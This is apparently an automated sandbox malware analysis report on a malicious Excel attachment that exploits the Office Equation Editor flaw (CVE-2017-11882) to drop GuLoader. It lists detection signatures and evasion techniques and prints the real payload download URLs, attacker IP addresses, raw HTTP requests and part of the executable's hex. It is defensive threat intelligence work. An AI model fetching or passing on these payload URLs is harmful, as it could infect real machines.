Windows Analysis Report ORDER RFQ1009202.xlsx

Overview

General Information

Sample Name:	ORDER RFQ1009202.xlsx
Analysis ID:	483003
MD5:	f60722f1276c17d3730a51d325e38e4f
SHA1:	db5bff43471b8729d3da739d85d156f586fd4ece
SHA256:	065e796cb07c1408bca1859b5ca5fae93d8bd6d145e0a547b9916f226c6d7fa8
Tags:	LokiVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

GuLoader behavior detected

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"}

Multi AV Scanner detection for submitted file

Source: ORDER RFQ1009202.xlsx	Virustotal: Detection: 35%			Perma Link
Source: ORDER RFQ1009202.xlsx	ReversingLabs: Detection: 27%

Antivirus detection for URL or domain

Source: http://23.95.85.181/msn/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://23.95.85.181/msn/vbc.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 51%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 27%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 27%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: ggle.io

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443

Source: excel.exe

Memory has grown: Private usage: 4MB later: 69MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downloa

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 151.101.65.195 151.101.65.195
Source: Joe Sandbox View	IP Address: 151.101.65.195 151.101.65.195

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 17:17:17 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Tue, 14 Sep 2021 02:46:53 GMTETag: "12000-5cbeb98214636"Accept-Ranges: bytesContent-Length: 73728Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e0 86 d4 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 30 00 00 00 00 00 00 5c 13 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 01 00 00 10 00 00 01 ee 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 ee 00 00 28 00 00 00 00 20 01 00 f5 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c4 11 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f5 09 00 00 00 20 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /4GZv HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ggle.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msn/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: 23.95.85.181

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 91D8F771.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91D8F771.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: ggle.io

Source: global traffic	HTTP traffic detected: GET /4GZv HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ggle.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msn/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: 23.95.85.181

Source: unknown

HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040135C	6_2_0040135C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023506C1	6_2_023506C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354559	6_2_02354559
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023599A3	6_2_023599A3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B9A	6_2_02355B9A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350DC2	6_2_02350DC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359A38	6_2_02359A38
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354C22	6_2_02354C22
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352615	6_2_02352615
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352009	6_2_02352009
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235027E	6_2_0235027E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235607E	6_2_0235607E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235747B	6_2_0235747B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354268	6_2_02354268
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235286A	6_2_0235286A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235506A	6_2_0235506A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351046	6_2_02351046
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357C4D	6_2_02357C4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235464E	6_2_0235464E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358CB4	6_2_02358CB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352ABC	6_2_02352ABC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353AB9	6_2_02353AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023532AD	6_2_023532AD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354AAC	6_2_02354AAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359A9F	6_2_02359A9F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358A83	6_2_02358A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351482	6_2_02351482
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354EF8	6_2_02354EF8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023582E1	6_2_023582E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023550E1	6_2_023550E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023544E2	6_2_023544E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023512DC	6_2_023512DC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023532C0	6_2_023532C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023504CB	6_2_023504CB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023558CA	6_2_023558CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352F36	6_2_02352F36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354932	6_2_02354932
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359127	6_2_02359127
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351328	6_2_02351328
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235312B	6_2_0235312B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235331E	6_2_0235331E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354106	6_2_02354106
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352D00	6_2_02352D00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B0B	6_2_02358B0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350F0A	6_2_02350F0A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358376	6_2_02358376
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353172	6_2_02353172
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357978	6_2_02357978
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353B67	6_2_02353B67
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350D57	6_2_02350D57
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357B4F	6_2_02357B4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023511B6	6_2_023511B6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355FB1	6_2_02355FB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351FBE	6_2_02351FBE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023547BA	6_2_023547BA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352FAC	6_2_02352FAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352B94	6_2_02352B94
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353793	6_2_02353793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354D92	6_2_02354D92
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B86	6_2_02358B86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359B86	6_2_02359B86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023599E0	6_2_023599E0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023583E3	6_2_023583E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023507ED	6_2_023507ED
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023591EF	6_2_023591EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358DEA	6_2_02358DEA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5B9A	9_2_001B5B9A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2615	9_2_001B2615
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2009	9_2_001B2009
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9A38	9_2_001B9A38
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7C4D	9_2_001B7C4D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B286A	9_2_001B286A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B506A	9_2_001B506A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4E68	9_2_001B4E68
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9A9F	9_2_001B9A9F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B0886	9_2_001B0886
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2ABC	9_2_001B2ABC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B32AD	9_2_001B32AD
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B04CB	9_2_001B04CB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B58CA	9_2_001B58CA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B32C0	9_2_001B32C0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B50E1	9_2_001B50E1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B331E	9_2_001B331E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2D00	9_2_001B2D00
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2F32	9_2_001B2F32
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B312B	9_2_001B312B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7978	9_2_001B7978
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3172	9_2_001B3172
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2B94	9_2_001B2B94
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B1FBE	9_2_001B1FBE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2FAC	9_2_001B2FAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B99A3	9_2_001B99A3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B09A0	9_2_001B09A0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9BC2	9_2_001B9BC2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B07ED	9_2_001B07ED
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B99E0	9_2_001B99E0

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_023594E2 NtProtectVirtualMemory,	6_2_023594E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354559 NtWriteVirtualMemory,	6_2_02354559
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B9A NtAllocateVirtualMemory,LoadLibraryA,	6_2_02355B9A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350DC2 CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	6_2_02350DC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354C22 NtWriteVirtualMemory,	6_2_02354C22
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235520E NtWriteVirtualMemory,	6_2_0235520E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355C7F NtAllocateVirtualMemory,	6_2_02355C7F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235506A NtWriteVirtualMemory,	6_2_0235506A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235464E NtWriteVirtualMemory,	6_2_0235464E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354AAC NtWriteVirtualMemory,	6_2_02354AAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354EF8 NtWriteVirtualMemory,	6_2_02354EF8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023550E1 NtWriteVirtualMemory,	6_2_023550E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023544E2 NtWriteVirtualMemory,	6_2_023544E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355CEC NtAllocateVirtualMemory,	6_2_02355CEC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359531 NtProtectVirtualMemory,	6_2_02359531
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354932 NtWriteVirtualMemory,	6_2_02354932
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358376 NtWriteVirtualMemory,LoadLibraryA,	6_2_02358376
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357B4F NtWriteVirtualMemory,	6_2_02357B4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B4A NtAllocateVirtualMemory,	6_2_02355B4A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023547BA NtWriteVirtualMemory,	6_2_023547BA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353793 NtWriteVirtualMemory,	6_2_02353793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354D92 NtWriteVirtualMemory,	6_2_02354D92
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5B9A NtAllocateVirtualMemory,	9_2_001B5B9A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5C7F NtAllocateVirtualMemory,	9_2_001B5C7F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CEC NtAllocateVirtualMemory,	9_2_001B5CEC

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: ORDER RFQ1009202.xlsx	Virustotal: Detection: 35%
Source: ORDER RFQ1009202.xlsx	ReversingLabs: Detection: 27%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER RFQ1009202.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDA8.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/21@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

